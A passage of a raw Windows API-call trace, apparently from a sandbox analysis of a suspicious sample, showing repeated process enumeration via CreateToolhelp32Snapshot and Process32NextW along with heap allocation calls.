th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0297.350] CloseHandle (hObject=0x294) returned 1 [0297.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0297.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0297.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0297.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0297.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0297.350] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0297.350] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0297.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0297.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0297.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0297.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0297.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0297.351] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0297.356] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.357] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0297.358] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0297.359] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0297.360] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0297.361] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0297.362] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0297.364] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0297.369] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0297.370] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0297.371] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.372] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.373] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.374] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.375] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.376] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0297.377] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.378] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.379] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0297.381] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0297.382] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0297.383] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0297.384] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.385] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0297.387] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0297.388] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0297.389] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0297.390] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0297.391] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0297.410] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0297.411] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0297.412] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0297.412] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0297.413] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0297.415] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0297.417] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0297.418] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0297.419] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0297.420] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0297.421] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0297.421] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0297.422] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0297.423] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0297.424] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.425] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0297.426] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.426] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0297.427] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0297.428] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0297.429] CloseHandle (hObject=0x294) returned 1 [0297.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0297.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0297.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0297.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0297.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0297.429] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0297.429] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0297.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0297.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0297.429] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0297.431] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.432] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0297.433] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0297.434] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0297.435] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0297.436] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0297.436] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0297.437] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0297.438] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0297.439] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0297.440] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.440] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.441] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.442] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.443] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.444] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0297.445] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.446] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.447] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0297.447] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0297.448] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0297.449] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0297.450] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.451] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0297.451] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: 